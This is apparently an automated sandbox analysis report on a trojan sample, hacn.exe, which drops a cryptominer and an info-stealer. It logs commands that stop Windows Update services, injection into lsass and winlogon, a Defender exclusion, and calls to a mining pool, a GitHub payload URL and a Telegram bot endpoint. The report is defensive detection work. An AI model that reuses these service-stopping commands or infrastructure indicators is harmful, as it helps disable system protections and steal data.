                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A131B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,17_2_00007FF65A131B54
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D32C560 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF61D32C560
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D346470 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF61D346470
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000EB146 GetVersionExW,4_2_000EB146
                                  Source: C:\Users\user\Desktop\hacn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: Yara matchFile source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: Yara matchFile source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: Yara matchFile source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: Yara matchFile source: 5.0.main.exe.244178405b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176d0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 5.0.main.exe.244176def04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000004.00000003.1670923663.0000000006800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 7748, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF1120 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,5_2_00007FFDF7CF1120
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information1
                                  Scripting
                                  Valid Accounts131
                                  Windows Management Instrumentation
                                  1
                                  Scripting
                                  11
                                  DLL Side-Loading
                                  21
                                  Disable or Modify Tools
                                  1
                                  Credential API Hooking
                                  2
                                  System Time Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  1
                                  Ingress Tool Transfer
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts2
                                  Native API
                                  11
                                  DLL Side-Loading
                                  1
                                  Access Token Manipulation
                                  11
                                  Deobfuscate/Decode Files or Information
                                  1
                                  Input Capture
                                  2
                                  File and Directory Discovery
                                  Remote Desktop Protocol1
                                  Screen Capture
                                  21
                                  Encrypted Channel
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts2
                                  Command and Scripting Interpreter
                                  11
                                  Windows Service
                                  11
                                  Windows Service
                                  2
                                  Obfuscated Files or Information
                                  Security Account Manager56
                                  System Information Discovery
                                  SMB/Windows Admin Shares1
                                  Credential API Hooking
                                  2
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts1
                                  Service Execution
                                  Login Hook813
                                  Process Injection
                                  11
                                  Software Packing
                                  NTDS551
                                  Security Software Discovery
                                  Distributed Component Object Model1
                                  Input Capture
                                  3
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                  Timestomp
                                  LSA Secrets3
                                  Process Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                  DLL Side-Loading
                                  Cached Domain Credentials251
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                  File Deletion
                                  DCSync1
                                  Application Window Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
                                  Rootkit
                                  Proc Filesystem1
                                  System Network Configuration Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                                  Masquerading
                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron251
                                  Virtualization/Sandbox Evasion
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                  Access Token Manipulation
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task813
                                  Process Injection
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                  Hidden Files and Directories
                                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1401452 Sample: hacn.exe Startdate: 01/03/2024 Architecture: WINDOWS Score: 100 108 raw.githubusercontent.com 2->108 110 pool.hashvault.pro 2->110 112 ip-api.com 2->112 122 Snort IDS alert for network traffic 2->122 124 Malicious sample detected (through community Yara rule) 2->124 126 Antivirus detection for dropped file 2->126 128 21 other signatures 2->128 12 hacn.exe 13 2->12         started        15 updater.exe 2->15         started        18 cmd.exe 1 2->18         started        20 3 other processes 2->20 signatures3 process4 file5 96 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 12->96 dropped 98 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 12->98 dropped 100 C:\Users\user\AppData\Local\Temp\...\s.exe, PE32 12->100 dropped 106 8 other files (7 malicious) 12->106 dropped 22 hacn.exe 12->22         started        102 C:\Windows\Temp\wxyubnjmnlae.tmp, PE32+ 15->102 dropped 104 C:\Windows\Temp\gqxqtdeqxchk.sys, PE32+ 15->104 dropped 168 Writes to foreign memory regions 15->168 170 Modifies the context of a thread in another process (thread injection) 15->170 172 Adds a directory exclusion to Windows Defender 15->172 174 2 other signatures 15->174 24 dialer.exe 15->24         started        27 dialer.exe 15->27         started        36 2 other processes 15->36 30 conhost.exe 18->30         started        32 sc.exe 1 18->32         started        38 4 other processes 18->38 34 conhost.exe 20->34         started        40 7 other processes 20->40 signatures6 process7 dnsIp8 42 cmd.exe 1 22->42         started        132 Injects code into the Windows Explorer (explorer.exe) 24->132 134 Writes to foreign memory regions 24->134 136 Allocates memory in foreign processes 24->136 142 2 other signatures 24->142 45 svchost.exe 24->45 injected 47 svchost.exe 24->47 injected 114 142.202.242.43, 443, 49731 1GSERVERSUS Reserved 27->114 138 Query firmware table information (likely to detect VMs) 27->138 140 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 27->140 signatures9 process10 signatures11 158 Stops critical windows services 42->158 49 s.exe 5 42->49         started        53 conhost.exe 42->53         started        process12 file13 84 C:\ProgramData\setup.exe, PE32+ 49->84 dropped 86 C:\ProgramData\main.exe, PE32 49->86 dropped 120 Multi AV Scanner detection for dropped file 49->120 55 setup.exe 3 49->55         started        59 main.exe 14 12 49->59         started        signatures14 process15 dnsIp16 88 C:\Users\user\AppData\...\wxyubnjmnlae.tmp, PE32+ 55->88 dropped 90 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 55->90 dropped 144 Machine Learning detection for dropped file 55->144 146 Writes to foreign memory regions 55->146 148 Modifies the context of a thread in another process (thread injection) 55->148 156 3 other signatures 55->156 62 dialer.exe 55->62         started        116 ip-api.com 208.95.112.1, 49729, 49732, 49748 TUT-ASUS United States 59->116 118 raw.githubusercontent.com 185.199.111.133, 443, 49730, 49733 FASTLYUS Netherlands 59->118 92 C:\Users\user\AppData\Roaming\...\Update.exe, PE32 59->92 dropped 94 C:\Users\user\AppData\...\sqlite.interop.dll, PE32+ 59->94 dropped 150 Multi AV Scanner detection for dropped file 59->150 152 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 59->152 154 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 59->154 65 cmd.exe 59->65         started        file17 signatures18 process19 signatures20 160 Contains functionality to inject code into remote processes 62->160 162 Writes to foreign memory regions 62->162 164 Allocates memory in foreign processes 62->164 166 3 other signatures 62->166 67 lsass.exe 62->67 injected 70 winlogon.exe 62->70 injected 72 svchost.exe 62->72 injected 74 dwm.exe 62->74 injected 76 conhost.exe 65->76         started        78 tasklist.exe 65->78         started        80 find.exe 65->80         started        82 7 other processes 65->82 process21 signatures22 130 Writes to foreign memory regions 67->130

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  hacn.exe47%ReversingLabsWin64.Trojan.Generic
                                  hacn.exe100%Joe Sandbox ML
                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp100%AviraRKIT/Agent.diumn
                                  C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe100%Joe Sandbox ML
                                  C:\Windows\Temp\wxyubnjmnlae.tmp100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                                  C:\ProgramData\main.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp100%Joe Sandbox ML
                                  C:\ProgramData\setup.exe100%Joe Sandbox ML
                                  C:\ProgramData\main.exe66%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                  C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\VCRUNTIME140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\_bz2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\_decimal.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\_hashlib.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\_lzma.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\_socket.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\libcrypto-1_1.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\python310.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\s.exe21%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\select.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI75722\unicodedata.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp92%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe66%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                  C:\Windows\Temp\gqxqtdeqxchk.sys5%ReversingLabs
                                  C:\Windows\Temp\wxyubnjmnlae.tmp55%ReversingLabsWin64.Trojan.Generic
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  http://cacerts.digicert.co0%URL Reputationsafe
                                  https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt0%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com0%Avira URL Cloudsafe
                                  https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-0%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  raw.githubusercontent.com
                                  185.199.111.133
                                  truefalse
                                    unknown
                                    ip-api.com
                                    208.95.112.1
                                    truefalse
                                      high
                                      pool.hashvault.pro
                                      142.202.242.45
                                      truefalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txtfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://ip-api.com/json/false
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688hacn.exe, 00000001.00000002.1665413675.000001E4E5D7C000.00000004.00001000.00020000.00000000.sdmpfalse
                                            high
                                            http://cacerts.digicert.cohacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://raw.githubusercontent.commain.exe, 00000005.00000002.1756028190.000002441A6B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.python.org/download/releases/2.3/mro/.hacn.exe, 00000001.00000002.1665862675.000001E4E65E8000.00000004.00001000.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerhacn.exe, 00000001.00000003.1656455258.000001E4E4505000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663171779.000001E4E44D5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663107087.000001E4E4530000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1664004818.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663028720.000001E4E4527000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000002.1665270780.000001E4E44D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654402774.000001E4E4534000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1654233604.000001E4E4532000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662960755.000001E4E4523000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1663139978.000001E4E44C5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1662672451.000001E4E451F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://ip-api.commain.exe, 00000005.00000002.1756028190.0000024419A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.python.org/dev/peps/pep-0205/hacn.exe, 00000000.00000003.1644672626.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1656605563.000001E4E64DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://python.org/dev/peps/pep-0263/hacn.exe, 00000001.00000002.1666681967.00007FFDFB78F000.00000002.00000001.01000000.00000004.sdmpfalse
                                                      high
                                                      https://api.telegram.org/file/botmain.exe, 00000005.00000002.1775219173.00000244324E6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000005.00000000.1676503591.00000244176D2000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                        high
